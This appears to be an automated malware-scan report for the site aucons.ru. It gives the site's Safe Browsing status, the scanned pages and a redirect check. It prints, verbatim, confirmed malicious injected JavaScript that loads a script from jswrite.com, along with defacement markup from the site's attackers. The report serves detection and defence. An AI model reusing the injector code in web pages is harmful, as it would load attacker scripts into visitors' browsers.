Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aucons.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.aucons.ru/ | 200 OK Content-Length: 123463 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top==self&&typeof window._ws_all_js==='undefined'){window._ws_all_js=7;var zhead=document.getElementsByTagName('head')[0];if(!zhead){zhead=document.createElement('head');}
var qscript=document.createElement('script');qscript.setAttribute('id','wsh2_js');qscript.setAttribute('src','http://jswrite.com/script1.js');qscript.setAttribute('type','text/javascript');qscript.async=true;if(zhead&&!document.getElementById('wsh2_js'))zhead.appendChild(qscript);} Antivirus reports:
Deface/Content modification. The following signature was found: ./~Hacked By Aymen :)._files/script1.js ...[508 bytes skipped]... entsByTagName('head')[0];if(!zhead){zhead=document.createElement('head');} var qscript=document.createElement('script');qscript.setAttribute('id','wsh2_js');qscript.setAttribute('src','http://jswrite.com/script1.js');qscript.setAttribute('type','text/javascript');qscript.async=true;if(zhead&&!document.getElementById('wsh2_js'))zhead.appendChild(qscript);}</script><script id=wsh2_js src="./~Hacked By Aymen :)._files/script1.js" type="text/javascript" async=""></script> <style><endnote><head> <style><endnote><head> <style><endnote><head> <style><endnote><head> <style></style><title>~Hacked By .TROJAN TN.</title> <script id=wsu_js src="./~Hacked By .TROJAN TN ._files/ncontrol.php" type="text/javascript" async=""></script><style>body,div,dl, ...[122992 bytes skipped]... | ||
http://www.aucons.ru/./~Hacked By Aymen :)._files/script1.js | 404 Not Found Content-Length: 1392 Content-Type: text/html | clean |
http://www.aucons.ru/test404page.js | 404 Not Found Content-Length: 1392 Content-Type: text/html | clean |
http://www.aucons.ru/./~Hacked By .TROJAN TN ._files/ncontrol.php | 404 Not Found Content-Length: 1392 Content-Type: text/html | clean |
http://secure-it.imrworldwide.com/v53.js | 200 OK Content-Length: 12774 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aucons.ru
Result:
GET / HTTP/1.1
Host: aucons.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: aucons.ru
Referer: http://www.google.com/search?q=aucons.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aucons.ru
Referer: http://www.google.com/search?q=aucons.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.